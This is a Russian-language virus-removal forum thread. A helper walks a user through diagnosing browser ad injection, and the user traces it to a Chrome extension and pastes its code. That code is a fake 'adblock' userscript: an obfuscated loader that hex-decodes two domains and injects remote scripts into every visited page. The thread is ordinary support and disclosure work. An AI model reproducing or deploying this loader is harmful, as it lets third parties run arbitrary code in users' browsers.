Траблы: Реклама в браузере.

[lobiol]

Прикрепил.

 

[Sandor]

--------------------------- [ OtherUtilities ] ----------------------------

WinRAR 5.31 v.5.31 Внимание! Скачать обновления

--------------------------------- [ IM ] ----------------------------------

Skype™ 7.27 v.7.27.101 Внимание! Скачать обновления

^Необязательное обновление.^

--------------------------------- [ P2P ] ---------------------------------

BitTorrent v.7.9.8.42577 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.

-------------------------------- [ Java ] ---------------------------------

Java 8 Update 111 v.8.0.1110.14 Внимание! Скачать обновления

^Удалите старую версию и установите новую (jre-8u112-windows-i586.exe)^

--------------------------- [ AppleProduction ] ---------------------------

iTunes v.12.4.1.6 Внимание! Скачать обновления

^Для проверки новой версии используйте приложение Apple Software Update^

 

 

Прочтите и выполните Рекомендации после удаления вредоносного ПО

[lobiol]

Но рекламу мы с вами так и не удалили. 

То что программа показывает, что все хорошо, не обозначает, что проблема исчезла.

http://joxi.ru/krD4jOXt9W3grp

Изменено 4 ноября, 2016 пользователем lobiol

[Sandor]

Прошу прощения. Это я хотел только посмотреть уязвимые места.

• Скачайте Universal Virus Sniffer (uVS)
• Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
• Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

  !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

• Дождитесь окончания работы программы и прикрепите лог к посту в теме.

  !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

• Подробнее читайте в руководстве Как подготовить лог UVS.

[lobiol]

321

[Sandor]

Проверьте, пожалуйста, наблюдается ли подобное в IE.

 

Программу cFosSpeed ставили самостоятельно? Эффект есть?

[lobiol]

В В IE роде как нету. 

_______

Результат от программы то есть, но вот у меня с ней проблемка была после давнишней чистки компьютера. 

В итоге, поддержка отослала меня к " Известным проблемам", что не особо меня порадовало. 

Русская локализация то есть, часть сайта тоже на русском, а вот сама поддержка и "проблемы" на английском. А я таки не знаток) 

[Sandor]

Отключите в Хроме все расширения, в т.ч. стандартные. Пропадет, включайте по одному, пока не найдете виновника. Название сообщите.

[lobiol]

Походу, это было из-за этого.

 

А вот это было написано внутри скрипта:

// ==UserScript==
// @name adblock
// @namespace adblock.ru
// @version 3.0.31
// @source adblock.ru
// @description Скрипт работает с контентом.
// @updateURL http://ec2-52-29-164-184.eu-central-1.compute.amazonaws.com/ad-block5.user.js
// @downloadURL http://ec2-52-29-164-184.eu-central-1.compute.amazonaws.com/ad-block5.user.js
// @include http://*/*
// @include https://*/*
// @exclude *mail.ru*
// @exclude */ok.ru*
// @exclude */my.com*
// @exclude */vk.ru*
// @exclude */vk.com*
// ==/UserScript==

!function(){var t=JSON.parse('["32386e32676c3377667962302e7275","646d7564337679736a61366d65342e7275"]'),e="26534",o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",o=0;o<t.length;o++)e+=String.fromCharCode(parseInt(t[o],16));return e},n=function(t,e,o){var n=document.location.protocol+"//"+t;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild(r),r.onload=function(){this.a982392846||(this.a982392846=!0,"function"==typeof e&&e())},r.onerror=function(){this.a982392846||(this.a982392846=!0,r.parentNode.removeChild(r),"function"==typeof o&&o())}}},r=function(i){var a=i?i:t[0],s=o(a)+"/pjs/"+e+".js";n(s,function(){},function(){var e=t.indexOf(a),o=t[e+1];o&&r(o)})};r()}();

Изменено 12 ноября, 2016 пользователем lobiol

[Sandor]

Обновите что указано в сообщении №32 и читайте Рекомендации после удаления вредоносного ПО